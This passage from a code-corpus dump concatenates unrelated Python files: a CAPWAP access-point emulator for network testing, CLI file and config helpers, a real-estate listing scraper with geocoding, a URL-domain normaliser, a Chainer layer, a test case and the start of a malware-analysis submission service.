elif dot11_bytes[40:42] == self.ARP_REP: # 'is-at'
client.seen_arp_reply = True
def handle_client_icmp(self, dot11_bytes, ap):
ip = dot11_bytes[50:54]
client = self.client_per_ip.get(ip)
if not client:
return
if client.ap is not ap:
self.err('Got ICMP to client %s via wrong AP (%s)' % (client.ip, ap.name))
return
if dot11_bytes[54:55] == self.ICMP_REQ:
rx_pkt = Dot11_swapped(dot11_bytes)
tx_pkt = Ether(src = client.mac, dst = rx_pkt.addr3) / rx_pkt[IP].copy()
tx_pkt[IP].src, tx_pkt[IP].dst = tx_pkt[IP].dst, tx_pkt[IP].src
tx_pkt[ICMP].type = 'echo-reply'
del tx_pkt[ICMP].chksum
self.send_pkts.append(ap.wrap_pkt_by_wlan(client, bytes(tx_pkt)))
def main_loop(self):
echo_send_timer = PassiveTimer(1)
self.send_pkts = []
while self.capture_id:
now_time = time.time()
self.send(self.send_pkts)
self.send_pkts = []
resps = self.recv()
try:
if not self.ap_mngr.service_ctx[self.port_id]['synced']: # update only if required
with self.ap_mngr.bg_lock:
aps = list(self.ap_mngr.aps)
clients = list(self.ap_mngr.clients)
self.ap_mngr.service_ctx[self.port_id]['synced'] = True
self.ap_per_ip = dict([(ap.ip_bytes, ap) for ap in aps if ap.port_id == self.port_id])
self.client_per_mac = dict([(client.mac_bytes, client) for client in clients])
self.client_per_ip = dict([(client.ip_bytes, client) for client in clients])
except KeyError as e:
if self.port_id not in self.ap_mngr.service_ctx:
return
if echo_send_timer.has_expired():
echo_send_timer = PassiveTimer(0.5)
for ap in self.ap_per_ip.values():
if ap.is_connected:
if ap.echo_resp_timer and ap.echo_resp_timer.has_expired(): # retry echo
if ap.echo_resp_retry > 0:
ap.echo_resp_timeout *= 2
ap.echo_resp_timer = PassiveTimer(ap.echo_resp_timeout)
ap.echo_resp_retry -= 1
tx_pkt = ap.get_echo_capwap()
self.send_pkts.append(ap.get_echo_wrap(ap.encrypt(tx_pkt)))
else:
self.err("Timeout in echo response for AP '%s', disconnecting" % ap.name)
self.shutdown_ap(ap)
for ap in self.ap_per_ip.values():
if ap.is_connected:
if time.time() > ap.last_echo_req_ts + ap.echo_req_interval: # new echoes
tx_pkt = ap.get_echo_capwap()
ap.last_echo_req_ts = time.time()
ap.echo_resp_timeout = ap.capwap_RetransmitInterval
ap.echo_resp_timer = PassiveTimer(ap.echo_resp_timeout)
ap.echo_resp_retry = ap.capwap_MaxRetransmit
self.send_pkts.append(ap.get_echo_wrap(ap.encrypt(tx_pkt)))
if len(self.send_pkts) > 200:
break
if not resps and not self.send_pkts:
time.sleep(0.01)
continue
for resp in resps:
if not self.capture_id:
return
rx_bytes = resp['binary']
dst_mac = rx_bytes[:6]
ether_type = rx_bytes[12:14]
if ether_type == self.ARP_ETHTYPE:
self.handle_ap_arp(rx_bytes)
elif ether_type == self.IP_ETHTYPE:
ip = rx_bytes[30:34]
if ip not in self.ap_per_ip: # check IP
continue
ap = self.ap_per_ip[ip]
dst_mac = rx_bytes[:6]
if dst_mac not in (b'\xff\xff\xff\xff\xff\xff', ap.mac_bytes): # check MAC (bytes literal, to match rx_bytes slices)
ap.err('Bad MAC (%s) for packet addressed to AP IP (%s)' % (str2mac(dst_mac), str2ip(ip)))
continue
ip_proto = rx_bytes[23:24]
if ip_proto == self.ICMP_PROTO:
self.handle_ap_icmp(rx_bytes, ap)
elif ip_proto == self.UDP_PROTO:
udp_port_str = rx_bytes[36:38]
if udp_port_str != ap.udp_port_str: # check UDP port
ap.err('Bad UDP port (%s) for packet addressed to AP IP (%s)' % (str2int(udp_port_str), str2ip(ip)))
continue
udp_src = rx_bytes[34:36]
if udp_src == self.CAPWAP_CTRL_PORT:
self.process_capwap_ctrl(rx_bytes, ap)
elif udp_src == self.CAPWAP_DATA_PORT:
if ord(rx_bytes[45:46]) & 0b1000: # CAPWAP Data Keep-alive
ap.got_keep_alive = True
continue
dot11_offset = 42 + ((ord(rx_bytes[43:44]) & 0b11111000) >> 1)
dot11_bytes = rx_bytes[dot11_offset:]
#Dot11_swapped(dot11_bytes).dump_offsets_tree()
if dot11_bytes[:2] == self.WLAN_ASSOC_RESP: # Client assoc. response
mac_bytes = dot11_bytes[4:10]
client = self.client_per_mac.get(mac_bytes)
if client:
client.is_associated = True
elif dot11_bytes[32:34] == self.ARP_ETHTYPE:
self.handle_client_arp(dot11_bytes, ap)
elif dot11_bytes[32:34] == self.IP_ETHTYPE and dot11_bytes[43:44] == self.ICMP_PROTO:
self.handle_client_icmp(dot11_bytes, ap)
class ServiceAp(Service):
requires_dtls = True
def __init__(self, ap, verbose_level = Service.WARN):
Service.__init__(self, verbose_level)
self.ap = ap
self.name = '%s of %s' % (self.__class__.__name__, ap.name)
def get_filter_type(self):
return ServiceFilterPerAp
def timeout(self):
self.ap.warn('Timeout in FSM %s' % self.name)
def log(self, msg):
self.ap.info(msg)
def err(self, msg):
self.ap.err('Error in FSM %s: %s' % (self.name, msg))
def run(self, pipe):
if self.requires_dtls and not self.ap.is_dtls_established:
self.err('DTLS is not established for AP %s' % self.ap.name)
return
self.ap.info('Starting FSM %s' % self.name)
run_gen = self.run_with_buffer()
send_data = None
while True:
if self.requires_dtls and not self.ap.is_dtls_established:
self.log('DTLS session got closed for AP %s, exiting FSM' % self.ap.name)
break
try:
action = run_gen.send(send_data)
except StopIteration:
action = 'done'
if type(action) is tuple and len(action) == 2:
action, val = action
if action == 'get':
send_data = None
resp = yield pipe.async_wait_for_pkt(time_sec = val, limit = 1)
if resp:
send_data = resp[0]['pkt']
elif action == 'put':
if type(val) is list:
for v in val:
pipe.async_tx_pkt(PacketBuffer(v))
else:
pipe.async_tx_pkt(PacketBuffer(val))
elif action == 'sleep':
yield pipe.async_wait(val)
elif action == 'done':
self.log('Finished successfully FSM %s' % self.name)
break
elif action == 'err':
self.err(val)
break
elif action == 'time':
self.timeout()
break
else:
raise Exception('Incorrect action in FSM %s: %s' % (self.name, action))
def hex(buf, delimiter = ' '):
if not buf:
return 'Empty buffer'
return delimiter.join(['%02x' % (c if type(c) is int else ord(c)) for c in buf])
################ FSMs ##################
class ServiceApDiscoverWLC(ServiceAp):
requires_dtls = False
def run_with_buffer(self):
# First resolve WLC MAC if needed
if self.ap.wlc_ip_bytes and not self.ap.mac_dst_bytes:
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if self.ap.mac_dst_bytes:
break
RetransmitInterval *= 2
arp = self.ap.get_arp_pkt('who-has', src_mac_bytes=self.ap.mac_bytes, src_ip_bytes=self.ap.ip_bytes)
yield ('put', arp)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired() and not self.ap.mac_dst_bytes:
yield ('sleep', 0.1)
if self.ap.wlc_ip_bytes and not self.ap.mac_dst_bytes:
yield ('err', 'Unable to resolve MAC address of WLC for %s' % self.ap.ip_dst)
self.ap.rx_responses[2] = -1
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
discovery_pkt = self.ap.wrap_capwap_pkt(CAPWAP_PKTS.discovery(self.ap), is_discovery = True)
yield ('put', discovery_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
result_code = self.ap.rx_responses[2]
if result_code in (None, 0, 2):
self.log('Got discovery response from %s' % self.ap.ip_dst)
yield 'done'
if result_code != -1:
self.ap.mac_dst_bytes = None
self.ap.mac_dst = None
yield ('err', 'Not successful result %s - %s.' % (result_code, capwap_result_codes.get(result_code, 'Unknown')))
yield ('sleep', 0.1)
self.ap.mac_dst_bytes = None
self.ap.mac_dst = None
yield 'time'
class ServiceApEstablishDTLS(ServiceAp):
requires_dtls = False
aps_by_ssl = {}
@staticmethod
def openssl_callback(ssl, where, ret):
pipe = ServiceApEstablishDTLS.aps_by_ssl[ssl]['pipe']
ap = ServiceApEstablishDTLS.aps_by_ssl[ssl]['ap']
if libcrypto.BIO_ctrl_pending(ap.out_bio):
ssl_data = ap.ssl_read()
if ssl_data:
pkt = ap.wrap_capwap_pkt(b'\1\0\0\0' + ssl_data)
pipe.async_tx_pkt(PacketBuffer(pkt))
return 0
ssl_info_callback_type = CFUNCTYPE(c_int, c_void_p, c_int, c_int)
ssl_info_callback_func = ssl_info_callback_type(openssl_callback.__func__)
def run(self, pipe):
assert self.ap.ssl and (self.ap.ssl not in self.aps_by_ssl)
#assert not self.ap.is_dtls_established(), 'AP %s has already established DTLS connection!' % self.ap.name
self.aps_by_ssl[self.ap.ssl] = {'ap': self.ap, 'pipe': pipe}
with self.ap.ssl_lock:
libssl.SSL_clear(self.ap.ssl)
libssl.SSL_set_info_callback(self.ap.ssl, self.ssl_info_callback_func) # set ssl callback
libssl.SSL_do_handshake(self.ap.ssl)
try:
timer = PassiveTimer(5)
self.ap.info('Start handshake')
while not timer.has_expired():
if self.ap.is_handshake_done_libssl():
self.ap.is_handshake_done = True
return
if self.ap.is_dtls_closed_libssl():
self.ap.is_dtls_closed = True
self.err('DTLS session got closed for ap %s' % self.ap.name)
return
resps = yield pipe.async_wait_for_pkt(time_sec = 1, limit = 1)
if not resps:
continue
pkt_bytes = resps[0]['pkt']
is_dtls = struct.unpack('?', pkt_bytes[42:43])[0]
if is_dtls:
self.ap.decrypt(pkt_bytes[46:])
self.timeout()
finally:
with self.ap.ssl_lock:
libssl.SSL_set_info_callback(self.ap.ssl, None) # remove ssl callback
if self.ap.ssl in self.aps_by_ssl:
del self.aps_by_ssl[self.ap.ssl]
class ServiceApEncryptedControl(ServiceAp):
def control_round_trip(self, tx_pkt, expected_response_type):
self.ap.rx_responses[expected_response_type] = -1
RetransmitInterval = self.ap.capwap_RetransmitInterval
if isinstance(tx_pkt, Packet) and self.ap.is_debug:
tx_pkt.show2()
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
tx_pkt = self.ap.wrap_capwap_pkt(b'\1\0\0\0' + self.ap.encrypt(tx_pkt))
yield ('put', tx_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
result_code = self.ap.rx_responses[expected_response_type]
if result_code in (None, 0, 2):
yield 'good_resp'
if result_code != -1:
yield ('err', 'Not successful result %s - %s.' % (result_code, capwap_result_codes.get(result_code, 'Unknown')))
yield ('sleep', 0.1)
yield 'time'
class ServiceApJoinWLC(ServiceApEncryptedControl):
def run_with_buffer(self):
self.log('Sending Join Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.join(self.ap), 4)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Join Response')
self.log('Sending Configuration Status Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.conf_status_req(self.ap), 6)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Configuration Status Response')
self.log('Sending Change State Event Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.change_state(self.ap), 12)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Change State Event Response')
self.log('Going to ack all config updates and try to get SSID')
while self.ap.last_recv_ts + 5 > time.time(): # ack all config updates in BG thread
if self.ap.SSID:
break
if self.ap.is_dtls_closed:
return
yield ('sleep', 0.1)
if not self.ap.SSID:
yield ('err', 'Did not get SSID from WLC!')
self.log('Sending Keep-alive.')
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
tx_pkt = self.ap.wrap_capwap_pkt(CAPWAP_PKTS.keep_alive(self.ap), dst_port = 5247)
if self.ap.is_debug:
Ether(tx_pkt).show2()
yield ('put', tx_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
if self.ap.got_keep_alive:
self.log('Received Keep-alive response.')
self.ap.last_echo_req_ts = time.time()
self.ap.is_connected = True
return
if self.ap.is_dtls_closed:
return
yield ('sleep', 0.1)
yield 'time'
class ServiceApAddClients(ServiceAp):
def __init__(self, ap, clients, verbose_level = Service.WARN):
ServiceAp.__init__(self, ap, verbose_level)
assert type(clients) is list
assert all([hasattr(c, 'mac') and hasattr(c, 'ip') for c in clients]), 'Clients should have attributes mac and ip'
self.clients = clients
def run_with_buffer(self):
if self.ap.get_open_auth_vap() is None:
yield ('err', 'No Open Auth SSID has been received by AP')
return
self.log('Sending Association requests.')
need_assoc_resp_clients = list(self.clients)
for client in need_assoc_resp_clients:
client.reset()
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if not need_assoc_resp_clients:
break
RetransmitInterval *= 2
tx_pkts = []
for client in need_assoc_resp_clients:
tx_pkt = CAPWAP_PKTS.client_assoc(self.ap, vap=self.ap.get_open_auth_vap(), client_mac = client.mac_bytes)
tx_pkts.append(self.ap.wrap_capwap_pkt(tx_pkt, dst_port = 5247))
yield ('put', tx_pkts)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired() and need_assoc_resp_clients:
yield ('sleep', 0.1)
for client in list(need_assoc_resp_clients):
if client.got_disconnect or client.is_associated:
need_assoc_resp_clients.remove(client)
not_assoc = [client.ip for client in self.clients if not client.is_associated]
if not_assoc:
yield ('err', 'No Association response for clients: %s' % ', '.join(sorted(not_assoc, key = natural_sorted_key)))
need_arp_resp_clients = list(self.clients)
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if not need_arp_resp_clients:
return
RetransmitInterval *= 2
tx_pkts = []
for client in need_arp_resp_clients:
garp = self.ap.get_arp_pkt('garp', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes)
tx_pkts.append(self.ap.wrap_pkt_by_wlan(client, garp))
arp = self.ap.get_arp_pkt('who-has', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes)
tx_pkts.append(self.ap.wrap_pkt_by_wlan(client, arp))
yield ('put', tx_pkts)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired() and need_arp_resp_clients:
yield ('sleep', 0.1)
for client in list(need_arp_resp_clients):
if client.got_disconnect or client.seen_arp_reply:
need_arp_resp_clients.remove(client)
class ServiceApShutdownDTLS(ServiceAp):
def run(self, pipe):
for client in self.ap.clients:
client.disconnect()
if not self.ap.is_dtls_established:
return
with self.ap.ssl_lock:
libssl.SSL_shutdown(self.ap.ssl)
tx_pkt = self.ap.wrap_capwap_pkt(b'\1\0\0\0' + self.ap.ssl_read())
self.ap.reset_vars()
yield pipe.async_tx_pkt(PacketBuffer(tx_pkt))
| StarcoderdataPython |
3466046 | <gh_stars>0
from __future__ import annotations
from datetime import datetime
import json
import os
from pathlib import Path
from typing import Any, Iterable, Optional
import click
import requests
import toml
from tqdm import tqdm
from xdg import BaseDirectory
from swcc.api import SwccSession
def raise_for_status(response: requests.Response):
try:
response.raise_for_status()
except requests.HTTPError:
data = None
try:
data = json.dumps(response.json(), indent=2)
except Exception:
data = response.text
if data:
click.echo(click.style(f'Received:\n{data}\n', fg='yellow'), err=True)
raise
def download_file(r: requests.Response, dest: Path, name: str, mtime: Optional[datetime] = None):
filename = dest / name
with tqdm.wrapattr(
open(filename, 'wb'),
'write',
miniters=1,
desc=str(filename),
total=int(r.headers.get('content-length', 0)),
) as f:
for chunk in r.iter_content(1024 * 1024 * 16):
f.write(chunk)
if mtime:
os.utime(filename, (datetime.now().timestamp(), mtime.timestamp()))
def files_to_upload(session: SwccSession, existing: Iterable, path: Path) -> Iterable[Path]:
existing_filenames = set([e.name for e in existing])
for filename in os.listdir(path):
if filename not in existing_filenames:
yield Path(path / filename)
def upload_path(session: SwccSession, path: Path, field: str, name=None) -> str:
if name is None:
name = path.name
with path.open('rb') as f:
return session.s3ff.upload_file(f, name, field)['field_value']
def update_config_value(filename: str, key: str, value: Any) -> None:
from swcc import SWCC_CONFIG_PATH
BaseDirectory.save_config_path(SWCC_CONFIG_PATH)
config_dir = BaseDirectory.load_first_config(SWCC_CONFIG_PATH)
config_file = os.path.join(config_dir, filename)
if os.path.exists(config_file):
with open(config_file, 'r') as infile:
config = toml.load(infile)
config['default'][key] = value
else:
config = {'default': {key: value}}
with open(config_file, 'w') as outfile:
toml.dump(config, outfile)
def get_config_value(filename: str, key: str) -> Optional[Any]:
from swcc import SWCC_CONFIG_FILE, SWCC_CONFIG_PATH
BaseDirectory.save_config_path(SWCC_CONFIG_PATH)
config_dir: Optional[str] = BaseDirectory.load_first_config(SWCC_CONFIG_PATH)
if config_dir:
config_file = os.path.join(config_dir, SWCC_CONFIG_FILE)
if os.path.exists(config_file):
with open(config_file, 'r') as infile:
config = toml.load(infile)['default']
return config.get(key)
return None
| StarcoderdataPython |
1669357 | <reponame>cmsong111/NJ_code
arr = []
count = int(input())
for i in range(count):
x, y =map(int,input().split())
arr.append([y,x])
arr.sort()
for i in range(count):
print(arr[i][1],arr[i][0])
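# Example (assumed input/output): with input
#   3
#   2 1
#   1 5
#   3 1
# each pair is stored as [y, x], sorted by y then x, and printed back as "x y":
#   2 1
#   3 1
#   1 5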
| StarcoderdataPython |
9608878 | import re
import time
import requests
import logging
import googlemaps
from io import BytesIO
from bs4 import BeautifulSoup
from typing import List, Optional, Tuple
from real_estate_it.model.search import Search
from real_estate_it.model.house import House
logger = logging.getLogger(__name__)
class Immobiliare:
def __init__(self,
search: Search,
enable_multipages: bool = True,
max_pages: int = 100,
enrich_geolocation: bool = True,
google_maps_key: str = None):
"""
        Get all the houses that match the search conditions
"""
self.search_data = search
self.urls_ = None
self.verbose = True
self.url = self.search_data.get_url_immobiliare()
self.wait = 0.001 # waiting time in seconds
self.max_pages = max_pages
self.enable_multipages = enable_multipages
self.min_acceptable_price = 1000 # houses less than 1k will probably have wrong price
self.enrich_geolocation = enrich_geolocation
self.maps_key = google_maps_key
if self.enrich_geolocation:
logger.info(f"Requiring geolocalitaion. Using Google key: {self.maps_key}")
else:
logger.info(f"Skipping geolocalization enrichment")
    def get_all_houses(self, limit: Optional[int] = None) -> List[House]:
"""
Get all the info for each of the parsed houses
:return: list of houses
"""
if not self.urls_:
self.urls_ = self.get_all_urls(limit)
all_results = []
for url in self.urls_:
try:
logger.info(f"Getting data from '{url}'")
all_results.append(self._get_data(url))
except Exception as e:
logger.warning(f"offending_url='%s' [%s]", url, e)
return all_results
    def get_all_urls(self, limit: Optional[int] = None) -> List[str]:
"""
Retrieve all the houses links parsing all the pages
:return: List of urls
"""
urls_ = []
# first page
logger.info(f"Processing page 1: {self.url}")
urls_ += self.parse_single_page(self.url, limit)
        if limit and len(urls_) >= limit:
return urls_
if self.enable_multipages:
# trying other pages
logger.debug("Processing further pages")
for i in range(2, self.max_pages): # that's enough of pages
logger.info(f"Processing page {i}")
curr_url = self.url + f"&pag={i}"
t = self._get_text(curr_url).lower()
if "404 not found" in t:
# no more pages found
break
urls_ += self.parse_single_page(curr_url)
                if limit and len(urls_) >= limit:
return urls_
logger.info("All retrieved urls in attribute 'urls_'")
logger.info(f"Found {len(urls_)} houses matching criteria.")
return urls_
    def parse_single_page(self, curr_url: str, limit: Optional[int] = None) -> List[str]:
"""
Identify ads from single page
:param curr_url: Url
:param limit
:return: List of urls
"""
url_list = []
pattern = re.compile(r"\d+\/$")
page = self._get_page(curr_url)
page.seek(0)
soup = BeautifulSoup(page, "html.parser")
for link in soup.find_all("a"):
time.sleep(self.wait)
l = link.get("href")
if l is None:
continue
if "https" in l and "annunci" in l:
if pattern.search(l):
url_list.append(l)
if limit and len(url_list) >= limit:
return url_list
return url_list
@staticmethod
def _get_page(url):
req = requests.get(url, allow_redirects=False)
page = BytesIO()
page.write(req.content)
return page
@staticmethod
def _get_text(sub_url):
req = requests.get(sub_url, allow_redirects=False)
page = BytesIO()
page.write(req.content)
page.seek(0)
soup = BeautifulSoup(page, "html.parser")
text = soup.get_text() # ?? OK on Mac, mayhem on Windows
# compacting text
t = text.replace("\n", "")
for _ in range(50): # that would be sufficient..
            t = t.replace("  ", " ")
return t
def _get_data(self, sub_url: str):
"""
This gets data from *one* of the sub-urls
"""
car_not_found = "n/a"
t = self._get_text(sub_url).lower()
address = self.parse_address(t)
cost = self.parse_cost(t, sub_url)
floor, ultimo = self.parse_floor(t)
area = self.parse_area(t, sub_url)
energy = self.parse_energetic_class(t, sub_url)
car = self.parse_car_spot(t, sub_url)
lat = 0
lng = 0
if self.enrich_geolocation:
lat, lng = self.get_geolocation(address)
# €/m²
try:
price_per_area = round(int(cost) / int(area), 1)
except Exception:
price_per_area = "n/a"
# Generate result
res = House(cost, price_per_area, floor, area, ultimo, sub_url, energy, car, address, lat, lng)
return res
def parse_address(self, t: str) -> str:
# address
address = "n/d"
address_patterns = (
r"((via|viale|piazza|corso|piazzale) \w+(\s\w+){1,}(.|,))",
)
for pattern in address_patterns:
add_pattern = re.compile(pattern)
address = add_pattern.search(t)
if address is not None:
return address.group(1)
return address
def parse_cost(self, t: str, sub_url: str) -> str:
price_not_found = -1
# price
cost_patterns = (
"€ (\d+\.\d+\.\d+)", # if that's more than 1M €
"€ (\d+\.\d+)"
)
for pattern in cost_patterns:
cost_pattern = re.compile(pattern)
try:
cost = cost_pattern.search(t)
cost = cost.group(1).replace(".", "")
break
except AttributeError:
continue
if cost is None:
if "prezzo su richiesta" in t:
logger.info(f"Price available upon request for {sub_url}")
cost = price_not_found
else:
logger.info(f"Can't get price for {sub_url}")
cost = price_not_found
if cost is not None and cost is not price_not_found:
# wrong house cost - price is too low
if int(cost) < self.min_acceptable_price:
if "prezzo su richiesta" in t:
logger.info(f"Price available upon request for {sub_url}")
cost = price_not_found
else:
logger.info(f"Too low house price: {int(cost)}? for {sub_url}")
cost = price_not_found
return cost
    def parse_floor(self, t: str) -> Tuple[str, bool]:
floor_patterns = (
r"piano (\d{1,2})",
r"(\d{1,2}) piano",
# if ultimo piano, floor number can be left out
r"(\d{1,2}) piani"
)
for pattern in floor_patterns:
floor_pattern = re.compile(pattern)
floor = floor_pattern.search(t)
if floor is not None:
floor = floor.group(1)
break
if "piano terra" in t:
floor = 1
if "ultimo" in t:
ultimo = True
else:
ultimo = False
return floor, ultimo
def parse_area(self, t: str, sub_url: str) -> str:
area_not_found = "n/a"
# Square meters
area_pattern = re.compile(r"superficie (\d{1,4}) m")
        try:
            area = area_pattern.search(t)
            area = area.group(1)
        except AttributeError:
            area = area_not_found
            if "asta" in t:
                logger.info(f"Auction house: no area info {sub_url}")
            else:
                logger.info(f"Can't get area info from url {sub_url}")
        return area
def parse_energetic_class(self, t: str, sub_url: str) -> str:
energy_not_found = "n/a"
# Energetic class
energy_patterns = (
r"energetica (\D{1,2}) ",
r"energetica(\S{1,2})",
)
for i, pattern in enumerate(energy_patterns):
energy_pattern = re.compile(pattern)
energy = energy_pattern.search(t)
if energy is not None:
energy = energy.group(1).upper()
if self.energy_acceptable(energy):
break
if energy is None or not self.energy_acceptable(energy): # in case everything fails
if "in attesa di certificazione" in t:
logger.info(f"Energy efficiency still pending for {sub_url} ")
energy = energy_not_found
else:
logger.info(f"Can't get energy efficiency from {sub_url}")
energy = energy_not_found
return energy
def parse_car_spot(self, t: str, sub_url: str) -> str:
car_not_found = "n/a"
# Car spot
car_patterns = (r"post\S auto (\d{1,2})",)
for pattern in car_patterns:
car_pattern = re.compile(pattern)
car = car_pattern.search(t)
if car is not None:
car = car.group(1)
break
if car is None:
available_upon_request = re.compile(r"possibilit\S.{0,10}auto")
if available_upon_request.search(t) is not None:
logger.info(f"Car spot/box available upon request for {sub_url}")
car = 0
else:
car = car_not_found
return car
def get_geolocation(self, address: str) -> Tuple[float, float]:
lat = 0.0
long = 0.0
address += f" {self.search_data.city}"
try:
gmaps = googlemaps.Client(key=self.maps_key)
# Geocoding an address
geocode_result = gmaps.geocode(address)
if isinstance(geocode_result, list):
lat = geocode_result[0]["geometry"]["location"]["lat"]
long = geocode_result[0]["geometry"]["location"]["lng"]
except Exception as ex:
logger.warning(f"unable to get location from {address}. [Exception: {ex}]")
return lat, long
def energy_acceptable(self, stringlike):
if not stringlike.startswith(("A", "B", "C", "D", "E", "F", "G")):
return False
else:
if len(stringlike) == 1:
return True
else:
if not stringlike.endswith(
("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+")
):
return False
else:
return True
| StarcoderdataPython |
9723650 | <filename>supertokens_python/normalised_url_domain.py
# Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import TYPE_CHECKING
from urllib.parse import urlparse
from .utils import is_an_ip_address
if TYPE_CHECKING:
pass
from .exceptions import raise_general_exception
class NormalisedURLDomain:
def __init__(self, url: str):
self.__value = normalise_domain_path_or_throw_error(url)
def get_as_string_dangerous(self):
return self.__value
def normalise_domain_path_or_throw_error(
input_str: str, ignore_protocol=False) -> str:
input_str = input_str.strip().lower()
try:
if (not input_str.startswith('http://')) and (not input_str.startswith('https://')) and \
(not input_str.startswith('supertokens://')):
raise Exception('converting to proper URL')
url_obj = urlparse(input_str)
if ignore_protocol:
if url_obj.hostname.startswith('localhost') or is_an_ip_address(url_obj.hostname):
input_str = 'http://' + url_obj.netloc
else:
input_str = 'https://' + url_obj.netloc
else:
input_str = url_obj.scheme + '://' + url_obj.netloc
return input_str
except Exception:
pass
if input_str.startswith('/'):
raise_general_exception('Please provide a valid domain name')
if input_str.startswith('.'):
input_str = input_str[1:]
if (
(
'.' in input_str
or
input_str.startswith('localhost')
)
and
(not input_str.startswith('http://'))
and
(not input_str.startswith('https://'))
):
input_str = 'https://' + input_str
try:
urlparse(input_str)
return normalise_domain_path_or_throw_error(input_str, True)
except Exception:
pass
raise_general_exception('Please provide a valid domain name')
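# Illustrative results traced from the logic above (assumed behaviour, not taken
# from the original file):
#   normalise_domain_path_or_throw_error('api.example.com')  # -> 'https://api.example.com'
#   normalise_domain_path_or_throw_error('localhost:3567')   # -> 'http://localhost:3567'
#   normalise_domain_path_or_throw_error('/relative/path')   # raises via raise_general_exception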
| StarcoderdataPython |
3210369 | <reponame>neurothrone/project-dot
from http import HTTPStatus
from .. import BaseClientTestCase
class ClientOpenTestCase(BaseClientTestCase):
def test_index_route(self):
response = self.client.get("/",
follow_redirects=True)
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertTrue("Search for Developers" in
response.get_data(as_text=True))
| StarcoderdataPython |
6653935 | <gh_stars>10-100
import chainer
from chainer import functions
from chainer import initializers
from ..functions import affine_channel_2d
class AffineChannel2D(chainer.Link):
"""A simple channel-wise affine transformation operation"""
def __init__(self, channels):
super(AffineChannel2D, self).__init__()
with self.init_scope():
self.W = chainer.variable.Parameter(
initializers.One(), (channels,))
self.b = chainer.variable.Parameter(
initializers.Zero(), (channels,))
def __call__(self, x):
W = functions.reshape(self.W, (1, -1, 1, 1))
b = functions.reshape(self.b, (1, -1, 1, 1))
return affine_channel_2d(x, W, b)
# return affine_channel_2d_naive(x, W, b) # use too large memory
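# Illustrative usage sketch (shapes and values assumed; not part of the original file):
#
#   import numpy as np
#   link = AffineChannel2D(channels=64)
#   x = np.zeros((1, 64, 32, 32), dtype=np.float32)   # NCHW feature map
#   y = link(x)   # W and b are broadcast to (1, C, 1, 1): per-channel y = W * x + b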
| StarcoderdataPython |
3406443 | <gh_stars>10-100
""" File Submission Service and Interfaces.
The Submission service encapsulates the core functionality of accepting,
triaging and forwarding a submission to the dispatcher.
SubmissionServer is typically exposed via HTTP interface implemented by al_ui,
however the core logic is implemented in SubmissionService to provide
separation between the network RPC interface and the actual submission logic.
There are three primary modes of submission:
two-phase (presubmit + submit)
inline (submit file)
existing (submit a file that is already in the file cache/SAN)
In two-phase mode, submission is a presubmit followed by a submit.
A 'presubmit' is sent to the submission service first. If the server already
has a copy of the sample it indicates as such to the client which saves the
client from copying the file again. Once the client has copied the file
(if required) it then issues a final 'submit'.
"""
import logging
import os
import pprint
import uuid
import tempfile
import time
from assemblyline.al.common import forge
from assemblyline.al.common.task import Task
from assemblyline.al.common.remote_datatypes import ExpiringHash
from assemblyline.al.core.filestore import CorruptedFileStoreException
from assemblyline.common import digests
from assemblyline.common import identify
from assemblyline.common.charset import safe_str
from assemblyline.common.isotime import now_as_iso
log = logging.getLogger('assemblyline.submission')
config = forge.get_config()
SUBMISSION_AUTH = (safe_str(config.submissions.user), safe_str(config.submissions.password))
SHARDS = config.core.dispatcher.shards
class SubmissionException(Exception):
pass
def assert_valid_file(path):
if not os.path.exists(path):
raise Exception('File does not exist: %s' % path)
if os.path.isdir(path):
raise Exception('Expected file. Found directory: %s' % path)
def assert_valid_sha256(sha256):
if len(sha256) != 64:
raise Exception('Invalid SHA256: %s' % sha256)
def effective_ttl(settings):
return settings.get('ttl', config.submissions.ttl)
def max_extracted(settings):
return settings.get('max_extracted', config.services.limits.max_extracted)
def max_supplementary(settings):
return settings.get('max_supplementary', config.services.limits.max_supplementary)
def ttl_to_expiry(ttl):
return now_as_iso(int(ttl) * 24 * 60 * 60)
class SubmissionWrapper(object):
@classmethod
def check_exists(cls, transport, sha256_list):
log.debug("CHECK EXISTS (): %s", sha256_list)
existing = []
missing = []
for sha256 in sha256_list:
if not transport.exists(sha256):
missing.append(sha256)
else:
existing.append(sha256)
return {'existing': existing, 'missing': missing}
# noinspection PyBroadException
